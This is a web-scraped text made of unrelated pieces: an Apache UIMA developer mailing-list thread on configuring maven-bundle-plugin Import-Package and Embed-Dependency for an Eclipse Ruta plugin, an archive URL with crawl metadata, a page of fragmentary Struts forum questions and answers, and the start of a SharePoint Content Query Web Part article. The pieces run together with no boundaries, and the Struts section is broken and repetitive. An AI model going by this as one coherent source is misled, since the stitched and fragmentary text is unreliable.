>>>>>>>>>>> On 9/2/2013 1:17 PM, Peter Klügl wrote:
>>>>>>>>>>>> Hi,
>>>>>>>>>>>>
>>>>>>>>>>>> I had a hard time to adapt the ruta.engine
bundle to the new layout,
>>>>>>>>>>>> which we use in the runtime plugin.
>>>>>>>>>>>>
>>>>>>>>>>>> Can someone explain to me the import section
in the manifest of the
>>>>>>>>>>>> runtime plugin? Why doesn't that cause problems
either when starting
>>>>>>>>>>>> eclipse or when building it with maven?
>>>>>>>>>>> hmmm, let's see how much I can remember :-)
>>>>>>>>>>>
>>>>>>>>>>> The bundle plugin can do 2 different things:
1) prepare a manifest, and 2) add
>>>>>>>>>>> things to the target/classes to be JARed up (at
a later time, perhaps, if the
>>>>>>>>>>> packaging type for the POM is "Jar".
>>>>>>>>>>>
>>>>>>>>>>> The POM could say the packaging type is "bundle",
but we use "jar" - this keeps
>>>>>>>>>>> the bundle plugin from doing the Jar, and allows
the mvn Jar plugin to do that
>>>>>>>>>>> (which, in turn, allows us to follow the apache
conventions for what goes into a
>>>>>>>>>>> Jar).
>>>>>>>>>>>
>>>>>>>>>>> The bundle plugin is typically driven by "export-package"
statements. These
>>>>>>>>>>> these get added to the manifest *and* are added
to the bundle's Jar. Except,
>>>>>>>>>>> since we're not using the bundle package, this
2nd step does something slightly
>>>>>>>>>>> different - it adds (if not already present)
the package to the target/classes
>>>>>>>>>>> (to be eventually added to the Jar in a later
Maven step). What gets added
>>>>>>>>>>> includes whatever can be found with that package
name in the sources
>>>>>>>>>>> (non-existent for runtime-plugins) and the dependency
jars.
>>>>>>>>>>>
>>>>>>>>>>> However, for the runtime plugin, we don't want
to add classes individually; we
>>>>>>>>>>> want to include entire sub-jars in our to-be-built-Jar.
>>>>>>>>>>>
>>>>>>>>>>> To support this, the bundle plugin has two instructions.
>>>>>>>>>>>
>>>>>>>>>>> 1) replace <Export-Package> with <_exportcontents>.
This does exactly the same
>>>>>>>>>>> thing as Export-Package for the manifest, but
doesn't do any actions re: copying
>>>>>>>>>>> dependencies into the target/classes spot.
>>>>>>>>>>>
>>>>>>>>>>> 2) add an <Embed-Dependency> statement
- This does 2 things: for each
>>>>>>>>>>> dependency, it (a) copies the Jar into the target/classes,
at some "path" - we
>>>>>>>>>>> use "" as the path - so these jars are copied
directly into target/classes, and
>>>>>>>>>>> will be zipped up by the subsequent mvn jar plugin.
>>>>>>>>>>>
>>>>>>>>>>> The 2nd thing it does is it adds to the manifest
a Bundle-Classpath element,
>>>>>>>>>>> specifying all the jars that got embedded, with
the right "path" inside the
>>>>>>>>>>> enclosing Jar.
>>>>>>>>>> I am quite sure that this does not work if you launch
an eclipse (Ruta
>>>>>>>>>> Workbench) with Eclipse 3.7.2. I tried a lot, but
the current trunk
>>>>>>>>>> works now only with newer eclipse installations.
>>>>>>>>> I tested 3.7.2 eclipse with 2.4.2 uima, and that worked
OK. So I think this
>>>>>>>>> approach does work.
>>>>>>>> Have you used the sources of the runtime plugin or an installed
version?
>>>>>>>> Or have you build it and put it in the dropins folder?
>>>>>>>>
>>>>>>>>> If you can make an SVN branch with this kind of approach,
I'll offer to check it
>>>>>>>>> out, build it, and then (with some guidance from you
:-) ) run some simple tests
>>>>>>>>> that you think will show the "problem", and have a look...
>>>>>>>> Testing is greatly appreciated :-)
>>>>>>>>
>>>>>>>> It's already in the trunk.
>>>>>>>>
>>>>>>>> Here's what I normally do when I test the Ruta Workbench:
>>>>>>>> - use eclipse 3.7.2 with subclipse, m2e with connectors
>>>>>>>> - install uima tooling and dltk 3.0 (eclipse update site)
>>>>>>>> - mvn clean install on ruta project
>>>>>>>> - select ruta-ep-ide -> run as eclipse application
>>>>>>>> - this will probably fail, increase the permgen space in
the launch
>>>>>>>> configuration that was created: add "-XX:PermSize=64M
>>>>>>>> -XX:MaxPermSize=128M" to the vm args
>>>>>>>> - launch eclipse again
>>>>>>>> - switch to the UIMA Ruta perspective
>>>>>>>> - right click in the script explorer and create a new UIMA
Ruta project,
>>>>>>>> e.g. Test
>>>>>>>> - right click on the script folder and create a new UIMA
Ruta script
>>>>>>>> file, e.g. Test
>>>>>>>> - fill the script file, e.g., with "W;"
>>>>>>>>
>>>>>>>> -> problems should occur here, at latest, because antlr
cannot be found
>>>>>>>> for parsing the script file. Normally, the CharStream class
is not found.
>>>>>>>>
>>>>>>>> - create a new txt file with some words in the input folder
>>>>>>>> - select the open editor of the script file
>>>>>>>> - press the debug button (launch debug config)
>>>>>>>> - open the xmi file in the output folder
>>>>>>>> - switch to the UIMA Ruta Explain perspective
>>>>>>>> - take a look at the Applied Rules view, this view should
contain some
>>>>>>>> rule matches
>>>>>>>>
>>>>>>>> Best,
>>>>>>>>
>>>>>>>> Peter
>>>>>>>>
>>>>>>>>> -Marshall
>>>>>>>>>>> This latter thing is what allows Eclipse to find
the packages inside the bundle
>>>>>>>>>>> inside the inner Jars.
>>>>>>>>>>>
>>>>>>>>>>> With this approach, no "import-package" statements
are used, unless you need to
>>>>>>>>>>> specify some non-default kind of resolution,
or "negate" some part of the
>>>>>>>>>>> import. Without import-package statements, the
default is to import all
>>>>>>>>>>> dependent packages.
>>>>>>>>>>>
>>>>>>>>>>> So, I would try: replace import-package with
_exportcontents, and add the Embed
>>>>>>>>>>> Dependencies element
>>>>>>>>>>>
>>>>>>>>>>> Does that work for you? If not, please describe
what's not working. See the
>>>>>>>>>>> uimaj-ep-runtime pom for an example of this.
>>>>>>>>>> Yes, I looked at uimaj-ep-runtime and adapted ruta-ep-engine.
>>>>>>>>>>
>>>>>>>>>> I do not know if I can summarize all problems :-(
>>>>>>>>>>
>>>>>>>>>> I think the main difference is that runtime does
not have any real
>>>>>>>>>> dependencies, but engine has. Therefore, the generated
import section in
>>>>>>>>>> the engine manifest contains really many packages.
I really wonder about
>>>>>>>>>> a few ones like groovy.lang, org.jruby, ... These
imports are of course
>>>>>>>>>> not resolved when I start eclipse with the bundle.
If I restrict the
>>>>>>>>>> imports to only those I need, then the bundle plugin
complains and stops
>>>>>>>>>> with an error.
>>>>>>>>>>
>>>>>>>>>> The only solution I found was to specify the import
section like that
>>>>>>>>>> one in my last mail: import the stuff I need (uima)
and exclude every
>>>>>>>>>> other namespace that would have been added to the
section.
>>>>>>>>>>
>>>>>>>>>> Well, it works now, but I am still a bit upset about
how the bundle
>>>>>>>>>> plugin handles the import section and wonder why,
e.g., the runtime
>>>>>>>>>> plugin needs an import section (in the manifest)
at all.
>>>>>>>>>>
>>>>>>>>>> Best,
>>>>>>>>>>
>>>>>>>>>> Peter
>>>>>>>>>>
>>>>>>>>>>
>>>>>>>>>>> -Marshall
>>>>>>>>>>>
>>>>>>>>>>>> I got my plugin to work, but do not really
know why. I had to added
>>>>>>>>>>>> something like the following to the maven-bundle-plugin:
>>>>>>>>>>>>
>>>>>>>>>>>> <Import-Package>
>>>>>>>>>>>> org.apache.uima.*,
>>>>>>>>>>>> !antlr, !bsh, !com.jamonapi, !com.sun.net.httpserver,
>>>>>>>>>>>> !edu.emory.mathcs.backport.java.util.concurrent,
>>>>>>>>>>>> !groovy.lang, !javax.annotation, !javax.ejb,
>>>>>>>>>>>> !javax.el, !javax.inject,
>>>>>>>>>>>> !javax.interceptor, !javax.jms,
>>>>>>>>>>>> !javax.management, !javax.management.modelmbean,
>>>>>>>>>>>> !javax.management.openmbean,
>>>>>>>>>>>> !javax.management.remote,
>>>>>>>>>>>> !javax.naming, !javax.persistence.spi,
!javax.rmi, !javax.servlet,
>>>>>>>>>>>> !javax.swing, !javax.swing.border,
>>>>>>>>>>>> !javax.swing.event, !javax.swing.text,
!javax.swing.tree,
>>>>>>>>>>>> !javax.validation,
>>>>>>>>>>>> !javax.validation.bootstrap,
>>>>>>>>>>>> !javax.validation.metadata, !javax.xml.namespace,
>>>>>>>>>>>> !javax.xml.parsers, !javax.xml.stream,
>>>>>>>>>>>> !javax.xml.stream.events, !javax.xml.stream.util,
>>>>>>>>>>>> !javax.xml.transform, !javax.xml.transform.sax,
>>>>>>>>>>>> !javax.xml.transform.stax,
>>>>>>>>>>>> !javax.xml.ws, !joptsimple, !net.sf.cglib.*,
!net.sf.ehcache.*,
>>>>>>>>>>>> !org.antlr.stringtemplate,
>>>>>>>>>>>> !org.apache.avalon.framework.logger,
>>>>>>>>>>>> !org.apache.commons.pool,
>>>>>>>>>>>> !org.apache.commons.pool.impl,
>>>>>>>>>>>> !org.apache.log, !org.apache.log4j, !org.apache.log4j.xml,
>>>>>>>>>>>> !org.aspectj.*, !org.codehaus.groovy.*,
!org.hibernate.* ,
>>>>>>>>>>>> !org.joda.*, !org.jruby.*, !org.omg.CORBA,
>>>>>>>>>>>> !org.springframework.instrument,
>>>>>>>>>>>> !org.w3c.dom, !org.xml.sax, !org.xml.sax.ext,
!org.xml.sax.helpers
>>>>>>>>>>>> </Import-Package>
>>>>>>>>>>>>
>>>>>>>>>>>>
>>>>>>>>>>>> Best,
>>>>>>>>>>>>
>>>>>>>>>>>> Peter
>>>>>>>>>>>>
> | http://mail-archives.us.apache.org/mod_mbox/uima-dev/201309.mbox/%3C522757BF.8050900@schor.com%3E | CC-MAIN-2019-26 | refinedweb | 2,365 | 63.9 |
Struts Projects
the
database
Struts Projects explains here can be used as dummy project to learn...
Struts project. Download
the source code of Struts Hibernate Integration Tutorial...
Struts Projects
Easy Struts Projects to learn and get into development
Hello - Struts
to going with connect database using oracle10g in struts please write the code and send me its very urgent
only connect to the database code
Hi soniya,
Please implement following code
struts 2 project samples
struts 2 project samples please forward struts 2 sample projects like hotel management system.
i've done with general login application and all.
Ur answers are appreciated.
Thanks in advance
Raneesh
Hello - Struts
of project....open pop-up menu and access all page store in the database
Hello - Struts
Hello Hi,
Can u tell me what is hard code please send example of hard code... Hi Friend !
Hard coding refers to the software... into the source code of a program or other executable object, or fixed formatting of the data
How to build a Struts Project - Struts
How to build a Struts Project Please Help me. i will be building a small Struts Projects, please give some Suggestion & tips,
I am new to struts.Please send the sample code for login and registration sample code with backend as mysql database.Please send the code immediately.
Please its urgent.
Regards,
Valarmathi Hi Friend
Struts - Struts
Java Bean tags in struts 2 i need the reference of bean tags in struts 2. Thanks! Hello,Here is example of bean tags in struts 2:http... code will help you learn Struts 2.Thanks like to make a registration form in struts inwhich... compelete code.
thanks Hi friend,
Please give details with full source code to solve the problem.
Mention the technology you have - Struts
Struts Hello
I have 2 java pages and 2 jsp pages in struts... with source code to solve the problem.
For read more information on Struts visit...
Hello + USERNAME
and it should also display if name is administrator Hello !
I have a servlet page and want to make login page in struts 1.1
What changes should I make for this?also write struts-config.xml and jsp code.
Code is shown below
struts
struts shopping cart project in struts with oracle database connection shopping cart project in struts with oracle database connection
Have a look at the following link:
Struts Shopping Cart using MySQL
Error - Struts
to test the examples
Run Struts 2 Hello...Error Hi,
I downloaded the roseindia first struts example... create the url for that action then
"Struts Problem Report
Struts has detected
struts 3.1 - Struts
struts 3.1 how to use struts 3.1.x version in our code as i am creating a project.
please reply as soon as possible
Struts Articles
, easy code, which you will be able to use in your own projects. Struts 1.2.4...) framework, and has proven itself in thousands of projects. Struts was ground-breaking...;
Strecks is built on the existing Struts 1.2 code base, adding a range of productivity start struts?
Hello Friend,
Please visit the following links:... can easily learn the struts.
Thanks
Struts Books
for applying Struts to J2EE projects and generally accepted best practices as well... for Struts applications, and scenarios where extending Struts is helpful (source code... it should be used on many (but not all) projects. Still, it is better to start a project
Struts 2 Hello World Annotation Example
Video tutorial of creating Struts 2 Hello World Annotation Example in
Eclipse... download the code of previous example from our tutorial page
Creating Hello... of creating Struts 2 Hello World Annotation Example:
Let's Starts
the checkbox.i want code in struts
struts code - Struts
struts code In STRUTS FRAMEWORK
we have a login form with fields
USERNAME:
In this admin
can login and also narmal uses can log...://
Thanks
Struts <s:include> - Struts
Struts Hello guys,
I have a doubt in struts tag.
what am i... the source code the content is blank and is not included.
am i going wrong somewhere? or struts doesnt execute tags inside fetched page?
the same include code
projects
projects hi'Sir thank's
How to make collage library projects in gui or java code with from design - Struts
Struts Hello Experts,
How can i comapare
in jsp scriptlet in if conditions like...
2.ApplicationResources_it.properties
Strictly Struts
Hello readers. Yes this is an article.... how to build a simple Struts HTML page using taglibs
6. how to code
Reply - Struts
Reply Hello Friends,
please write the code in struts and send me I want to display "Welcome to Struts" please send me code its very urgent... connection
Thanks HelloWorld.jsp
Struts 2 Hello World
Java hello friends,
i am using struts, in that i am using tiles framework. here i wrote the following code in tiles-def.xml
in struts-config file i wrote the following action tag
Struts 2 Validation
Struts 2 Validation Hello,I have been learning struts.
I have... to add the Users to the database. So, have implemented the code.
See attachement...):
create database project;
create table users
(userid smallint unsigned application
not enter any data that time also it
will saved into databaseprint("code sample...struts application hi,
i can write a struts application in this first i can write enter data through form sidthen it will successfully saved
Developing JSP, Java and Configuration for Hello World Application
and required configuration files for
our Struts 2 Hello World application. Now... on the "Run Struts 2 Hello World Application"
link on the tutorial...;Struts 2 Hello World Application!</title>
</head>
<body>
Struts 2 Tutorials - Struts version 2.3.15.1
dependency of Struts 2.3.15.1
Creating Hello World application in Struts 2 version... IDE
Hello World application annotation version
Struts 2 in Agile Development... about the different configuration options of the Struts 2 based
project
code - Struts
code How to write the code for multiple actions for many submit buttons. use dispatch action
pls review my code - Struts
pls review my code Hello friends,
This is the code in struts. when i click on the submit button.
It is showing the blank page. Pls respond soon its urgent.
Thanks in advance.
public class LOGINAction extends Action Hibernate Integration
and you can download and
start working on it for your project or to learn Struts...
In this section we will write Hibernate Struts Plugin Java code...
Struts Hibernate
Need Project
Need Project How to develop School management project by using Struts Framework? Please give me suggestion and sample examples for my...Using radio button in struts Hello to all ,
I have a big problem that i am trying to solve.
Here are the details :
I have a list of TV's
Struts Book - Popular Struts Books
is a "hands-on" book filled with sample applications and code snippets you can reuse... the development of a non-trivial sample application - covering all the Struts components... to the Jakarta Struts Cookbook an amazing collection of code solutions to common
Struts 1 Tutorial and example programs
Struts 1 Tutorials and many example code to learn Struts 1 in detail.
Struts 1... completing this tutorial you will be able to use Hibernate in your
Struts project. Download
the source code of Struts Hibernate Integration Tutorial
Reply - Struts
Reply
Thanks For Nice responce Technologies::--JSP
please write the code and send me....when click "add new button" then get the null value...its urgent... Hi
can u explain in details about your project
saritha project - Struts
Tapestry - Struts
Tapestry
I want to use Tooltip in my project,
in which i m using... tooltipcomponent or how can i put tooltip using tapestry in my project....
pls respond me fast
thanks Hi friend,
Code to help in solving
Labels in Struts 2.0 - Struts
Labels in Struts 2.0 Hello, how to get the Label name from properties file
Single thread model - Struts
Single thread model Hi Friedns , thank u in advance
1)I need sample code to find and remove duplicates in
arraylist and hashmap.
2) In struts, ow to implement singlthread model and threadsafe
login application - Struts
login application Can anyone give me complete code of user login application using struts and database? Hello,
Here is good example of Login and User Registration Application using Struts Hibernate and Spring
Advertisements
If you enjoyed this post then why not add us on Google+? Add us to your Circles | http://roseindia.net/tutorialhelp/comment/18889 | CC-MAIN-2015-35 | refinedweb | 1,412 | 73.88 |
Opened 6 years ago
Closed 4 years ago
Last modified 4 years ago
#13997 closed New feature (fixed)
Add an example of constructing a MultiWidget and document the value_from_datadict method
Description
I've been trying to get a multiwidget but I could only see some(old) example on net, none in official docs...preatty hard to do without docs.
Attachments (4)
Change History (19)
comment:1 Changed 6 years ago by
comment:2 Changed 6 years ago by
comment:3 Changed 6 years ago by
Changed 6 years ago by
Documented using the Multiwidget with single value fields
comment:4 Changed 6 years ago by
I added a patch with an example widget for using a MultiWidget with the us.forms.USPhoneNumberField in localflavor.
Changed 6 years ago by
Modified the docs with better example and gave example usage.
Changed 6 years ago by
comment:5 Changed 6 years ago by
comment:6 Changed 5 years ago by
Milestone 1.3 deleted
comment:7 Changed 5 years ago by
comment:8 Changed 4 years ago by
It would be helpful if the documentation on MultiWidget also brought the method
value_from_datadict to the attention, next to
decompress, to also have the transformation from multiple widget values to the field value (
decompress does the reverse).
Example:
def value_from_datadict(self, data, files, name): values = super(MyMultiWidget, self).value_from_datadict(data, files, name) # i.e. return MyValueType(float(values[0]), float(values[1])) return MyValueType(... something with values ...)
comment:9 Changed 4 years ago by
comment:10 Changed 4 years ago by
We probably shouldn't use localflavor as an example at this point since it's being broken out into a separate package.
Changed 4 years ago by
comment:11 Changed 4 years ago by
I've added a patch that combines the two existing MultiWidget sections, documents value_from_datadict, and adds an example MultiWidget with an explanation of each method.
comment:12 Changed 4 years ago by
Looks great!
One sentence certainly isn't all that should be said about MultiWidget. It probably warrants a whole "Constructing A MultiWidget" section at the end of that page, complete with explanation and an example. | https://code.djangoproject.com/ticket/13997 | CC-MAIN-2016-44 | refinedweb | 358 | 50.77 |
You already know NumPy is a great python module for processing and manipulating multi-dimensional array. In this entire tutorial, you will learn how to reverse NumPy array through step by step.
There are three methods to reverse NumPy array. We will discuss all of them here.
- Using the Shortcut or slicing method
- Use of numpu.flip() method.
- Using numpy.flipud()
- Using numpu.flipr()
Step by Step implementation to reverse Numpy array
Step 1: Import all the necessary libraries.
Here we are using only NumPy libraries. That’s why I am importing it using the import statement.
import numpy as np
Step 2: Create NumPy array.
Now for the demonstration purpose lets we create a Numpy array. It will be of both single and multiple dimensions.
One Dimensional Array
array_1d = np.array([10,30,40,20])
Two Dimensional Array
array_2d = np.array([[10,30],[60,50]])
Step 3: Reverse Numpy Array.
Let’s reverse all the NumPy array I have created in step 2.
Method 1: Using the Shortcut.
The shortcut method to reverse the NumPy array is to use the slicing method. Use the below code.
For 1-D Array
array_1d[::-1]
2 -D Array
array_2d[::-1]
Output
Method 2 : Use of numpy.flip() method.
The numpy.flip() accepts two arguments. One is the array you want to flip. The second the axis value 0,1 or None. It is very useful if you want to flip some specific columns or rows.
For 1-D Array
np.flip(array_1d)
2 -D Array
np.flip(array_2d)
Output
Method 3: Using the numpy.flipud() method.
The third method for reversing the NumPy array is the numpy.flipud() method.
For 1-D Array
np.flipud(array_1d)
2 -D Array
To demonstrate for two-dimensional array, let’s create a diagonal matrix using the numpy.diag() method. I have not used the above 2D example here because the diagonal matrix clearly shows where the flipping has been done.
diagonal_matrix = np.diag([10,20,30])
Now pass it inside the np.flipud() method as an argument. It will Flip an array vertically (axis=0).
np.flipud(diagonal_matrix)
You will get the following output.
Method 4: Using the numpy.flipur() method.
Now the last method to reverse the NumPy array is the numpy.fliplr() method. It will Flip an array horizontally (axis=1). There is only one condition for using it. The NumPy array should be a 2 or N-dimensional array. I am using the same diagonal matrix used in method 3.
Execute the following line of code.
np.fliplr(diagonal_matrix)
Output
Conclusion
These are the methods for reversing the NumPy array. Methods 1,2 and 3 works on both single and multi-dimensional array. But the last method 4 works on only multi-dimensional array.
Hope you have liked this tutorial. Even if you have any query then you can contact us for more info.
Source of tutorial
Join our list
Subscribe to our mailing list and get interesting stuff and updates to your email inbox. | https://www.datasciencelearner.com/reverse-numpy-array-implementation/ | CC-MAIN-2021-39 | refinedweb | 503 | 70.39 |
When I prepare a IoT project with Arduino & Ethernet shield.
I want to know a network performance data of Aruidno to check a bandwidth budget for new IoT Project.
And, I discoverd Arduino site, google and so on to get a data.
But there was no cool, nice answer for me.
-----
So... I decide to check arduino network performance by myself.
and I think that there are many who want to check network performance by oneself.
-----
Just follow me, then you can check your arduino network performance.
We will use a "Iperf" tool to measure network performance. Refer below link to know about "Iperf" and "how to install ipert"
Teacher Notes
Teachers! Did you use this instructable in your classroom?
Add a Teacher Note to share how you incorporated it into your lesson.
We will use a Arduino and ethernet shield as a "Iperf server"
There are many arduino eithernet shield and I have several ethernet shield. I decide to use a wiz550io as a Arduino ethernet shield because it is a newest ethernet shield of Wiznet and have a more good network performance than original one.
Most of all, we have to update Ethernet Library to use a wiz550io for Arduino ethernet shield.
1. Download the WIZnet Ethernet Library
There is a "Download ZIP" which downloads everything in one neat little file.
-----
2. Copy the Ethernet folder into the Arduino Libraries folder. (Override built-in ethernet library)
[note] There are two versions of the Ethernet folder, depending on the version of your Arduino IDE.
-----
3. Verify Code
In the libraries/Ethernet/utility folder, open w5100.h and verify that only the 1 correct #define line is uncommented. For Wiz550io it looks like below and as a picture.
//#define W5100_ETHERNET_SHIELD // Arduino Ethernet Shield and Compatibles ...
//#define W5200_ETHERNET_SHIELD // WIZ820io, W5200 Ethernet Shield
#define W5500_ETHERNET_SHIELD // WIZ550io, ioShield series of WIZnet
Next we will set a PC as a client mode.
-----
It is very simple
Just open "Command prompt window" and
go to "iperf" installed directory using "cd", "dir" command as a first picture of this step.
Refer below link to know about "Iperf"
-----
And Type "iperf -c 192.168.1.177 -w 300k -t 100 -i 10" and Enter on command line as a picture.
Then you can see the result of network performance between Arduino and Computer.
In my case, network performance is 3.34Mbps.
Step 5: Final : See Demo Video
Now, I/we can measure network performance.
Here is a demo video which test network performance.
Please enjoy it.
-----
Thank you.
2 Discussions
1 year ago
iperf3 didn't work... i ad to use iperf2
Windows CMD:
iperf -c 192.168.22.11 -w 16k -t 20 -i 2
#include <SPI.h>
#include <Ethernet2.h>
//...
//iperf -c 192.168.22.11 -w 16k -t 20 -i 2
byte mac[] = {
0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED
};
IPAddress ip(192, 168, 22, 11);
IPAddress gateway(192, 168, 22, 1);
IPAddress dns_server(192, 168, 22, 1);
IPAddress subnet(255, 255, 0, 0);
EthernetServer server(5001);
void setup() {
Ethernet.begin(mac, ip, dns_server, gateway, subnet);
server.begin();
Serial.begin(9600);
while (!Serial) {
; // wait for serial port to connect. Needed for native USB
}
Serial.print("Iperf server address : ");
Serial.println(Ethernet.localIP());
Serial.println(" ");
SPI.setClockDivider(SPI_CLOCK_DIV2);
}
void loop() {
byte buf[1024];
EthernetClient client = server.available();
if (client) {
Serial.println("Here is new client for check arduino performance");
while (client.connected()) {
if (client.available()) client.read(buf, 1024);
}
client.stop();
Serial.println("client disonnected");
}
}
3 years ago
Is it possible to create Arduino as a iperf client?
Thank you! | https://www.instructables.com/id/How-to-measure-Arduino-network-performance/ | CC-MAIN-2019-35 | refinedweb | 594 | 67.86 |
It looks like you're new here. If you want to get involved, click one of these buttons!
Write a program for an Internet provider that displays a MessageBox asking users whether they want Internet access. If they do not, their total price is $0. If they do, display a second MessageBox asking whether they want limited access (at $10.95 per month) or unlimited access (at $19.95 per month). Display the total price in a third MessageBox. Title the program InternetAccess.
Here is my code so far: using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms;
namespace Internet { public partial class Form1 : Form { public Form1() { InitializeComponent(); }
private void button1_Click(object sender, EventArgs e) { DialogResult unlimited; DialogResult choice = MessageBox.Show("Internet Services are available as limited access at $10.95 per month \n and unlimited access at $19.95 per month.\n Do you want internet connection?", "Internet Service", MessageBoxButtons.YesNo); if (choice == DialogResult.Yes) unlimited = MessageBox.Show("Do you want unlimited package?", "Package", MessageBoxButtons.YesNo); if (unlimited == DialogResult.Yes); MessageBox.Show("Your price is $19.95 per month"); else; MessageBox.Show("Your price is $10.95 per month"); else; MessageBox.Show("display a total price of $0"); } } }
}
I'm not at all sure where I am going wrong!
Well for a start an 'if' statement doesn't end in a semi-colon, and neither does 'else'.
0 · Vote Down Vote Up · Share on Facebook
- Spam
0 · Vote Down Vote Up · Share on Facebook
- Spam
Although not strictly speaking necessary i would go with curly braces on all if statements for readability.
I presume you have this working now.
0 · Vote Down Vote Up · Share on Facebook
- Spam | http://programmersheaven.com/discussion/434604/writing-a-c-program | CC-MAIN-2014-42 | refinedweb | 299 | 55.61 |
Get the user name associated with the calling process
#include <unistd.h> char* getlogin( void ) ;
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
The getlogin() function returns a pointer to a string containing the login name of the user associated with the calling process.
A pointer to a string containing the user's login name, or NULL if the user's login name can't be found.
The return value from getlogin() may point to static data and, therefore, may be overwritten by each call.
POSIX 1003.1
getlogin_r(), getpwent(), getpwent_r(), getpwnam(), getpwuid() | http://www.qnx.com/developers/docs/6.5.0_sp1/topic/com.qnx.doc.neutrino_lib_ref/g/getlogin.html | CC-MAIN-2020-45 | refinedweb | 104 | 57.16 |
Home › Forums › WPF controls › Xceed DataGrid for WPF › Access the grid control from the App.cs
- AuthorPosts
- User (Old forums)MemberApril 29, 2007 at 3:29 pmPost count: 23064
Hi,
I apologize for my English first and foremost.
My application’s input is not through typing values into the grid, but rather through a different process, which inserts rows into the database.
After adding a new row to the database the grid does not refresh itself even though it is bound to the DataTable which has just been updated.
Therefor I wish to have a handle to the grid in the App.cs (where the input process runs) to enable me to use something like:
grid.Items.Refresh();
My grid resides in MainWindow.xaml.
The input process runs on App.cs.
When it finishes inserting a row I try using (within App.cs):
DataGridControl grid = ( DataGridControl )( this.MainWindow.FindName( “myGrid” ) );
but I get InvalidOperationException (The calling thread cannot access this object because a different thread owns it).
Plese help.
Imported from legacy forums. Posted by Golan (had 2476 views)Xceed SupportMemberApril 30, 2007 at 9:15 amPost count: 5658
Concerning the fact that the DataGridControl does not automatically show newly inserted items…
I’d like to have a clarification about your implementation. Are you adding the items directly in the database or do you pass through the DataTable object.
Normally, we receive a notification of addition when an item is added in the DataView (which the the “CollectionView” used by the DataGridControl to display a DataTable ( see DataTable.DefaultView). If this notification is effectivelly not send and you are updating the DataTable… Then I’d like to have more details.
Then, concerning the InvalidOperationException… UI Elements can only be accessed from the UI thread… One easy way to ensure you are executing on the UI Thread is to use the dispatcher for the UI element in question:
grid.Dispatcher.Invoke() and grid.Dispatcher.BeginInvoke() should do the trick!
I’ll be waiting for your feedback concerning the addition of items in the DataTable.
Note: Don’t worry, your English is very good!
Imported from legacy forums. Posted by Marcus [Xceed] (had 263 views)User (Old forums)MemberApril 30, 2007 at 4:36 pmPost count: 23064
Marcus, you are the best!
Thank you!
The Dispatcher.Invoke() was just what I needed.
Here is the code that did the trick:
…
using System;
namespace WindowsApplication1
{
public delegate void DelegateZeroParam( );
public partial class App : System.Windows.Application
{
…
void OnInputReady( DataObject newRecord)
{
this.dataManager.AddRecord(newRecord); // add the new record to the database
this.Dispatcher.Invoke( System.Windows.Threading.DispatcherPriority.Normal,
( DelegateZeroParam )delegate( )
{
((MainWindowClass)this.MainWindow).gridEntries.Items.Refresh( );
} );
}
}
}
MainWindowClass is the name of my main window class, where the DataGridControl (gridEntries) resides.
After updating the database the Dispacher invokes a delegate function, which now has access to the grid. All that’s left to do is tell the grid to refresh it’s items.
As for your question. Yes I use the DataTable to insert new DataRow into the database.
App.cs has a dataManager object which holds inside a DataSet.
App.cs exposes the DataTables inside the dataManager.dataSet property, as public DataTable properties.
ie:
public DataTable Entries
{
get{ return this.dataManager.dataSet.Tables[“Entries”]; }
}
On MainWindow.xaml the binding is done like so:
<xcdg:DataGridControl x:Name=”gridEntries” ItemsSource=”{Binding Source={x:Static Application.Current}, Path=Entries}”/>
the updating of the database is actually done in a different Data Access Layer project within this solution. The product of this project is the dataManager object I use in App.cs.
I use predefined stored procedures for handling all database functionalities.
Again, thank you Marcus.
I was not aware of the UI thread in WPF, nor to using the Dispatcher.
I hop this post will help others having the same problem as I did.
Imported from legacy forums. Posted by Golan (had 3621 views)
- AuthorPosts
- You must be logged in to reply to this topic. | https://forums.xceed.com/forums/topic/Access-the-grid-control-from-the-App-cs/ | CC-MAIN-2021-25 | refinedweb | 661 | 50.12 |
Game Development Reference
In-Depth Information
The reason Flash does this is because it needs a point of refer-
ence to be able to instantiate that symbol on the stage if it is used
in script somewhere. To see the evidence of this, you can look at
all the classes embedded in a compiled SWF inside of FlashDeve-
lop. In Fig. 4.1 , you can see the Flash library on the left, with the
symbol exported with the name
and reflected on the
right in the FlashDevelop project panel with the classes used in
the SWF.
If you had a class defined for the square, it would use that file
rather than generating its own. To see the result of this, we can
renamethelinkageclassfor the symbol to uppercase
“
square
”
“
Square
”
to
match the name of a class I have defined for it.
package {
import flash.display.Sprite;
public class Square extends Sprite {
public function Square() {
rotation = 45;
}
}
}
Now,whenthesquareisaddedtothestage,itwillberotated
45 degrees.
Class versus Base Class
When you open the linkage panel to assign a class to a symbol,
there is an additional field that is used to define the base class for a
symbol. The base class symbol is where you define what class you
would like to extend for that symbol. In the previous example, the
Square class extended from Sprite, so the base class for that symbol
was flash.display.Sprite, as shown in Fig. 4.2 .
Figure 4.1 FlashDevelop can
reveal the classes used in a
SWF.
Search Nedrilad ::
Custom Search | http://nedrilad.com/Tutorial/topic-56/Real-World-Flash-Game-Development-55.html | CC-MAIN-2017-39 | refinedweb | 256 | 69.21 |
Customizing the Content Query Web Part in SharePoint Server 2007
Summary: Walk through how to customize the Content Query Web Part (CQWP) in Microsoft Office SharePoint Server 2007 to query content across multiple sites in a site collection and display the results in any way that XSL can support. Learn how to get similar results when customizing the CQWP does not meet your needs. (20 printed pages)
Robert Bogue, Thor Projects
January 2010
Applies to: Microsoft Office SharePoint Server 2007
Download the code samples that accompany this article: SharePoint Content Query Web Part Examples
Contents
Introduction to SharePoint Content Query Web Part Customization
Scenario: Crafting Custom Queries for the Content Query Web Part
Customizing the Content Query Web Part Using the UI and the *.webpart File
Deriving a Class for the Content Query Web Part
Replacing the Content Query Web Part with SPSiteDataQuery or Search
-
-
Introduction to SharePoint Content Query Web Part Customization
The Content Query Web Part (CQWP) in Microsoft Office SharePoint Server 2007 provides important features for SharePoint users. Office SharePoint Server Web Parts generally work on a single list or library. That means that when users are presented with information, they are seeing information from just one place. However, in most organizations there is a real need to aggregate content over multiple lists and libraries and to present this content to the user in a single, unified view. Situations such as rolling up news from multiple departments are all too common in most organizations.
Although it is certainly possible that you can write your own Web Part to query multiple lists, it is also possible that you can run into performance issues that can make your entire system less responsive. The CQWP is designed specifically to take advantage of the SharePoint platform and to be minimally intrusive from a performance and scaling perspective. This design includes use of the SPSiteDataQuery objects to execute one search on an entire site collection and the extensive use of caching.
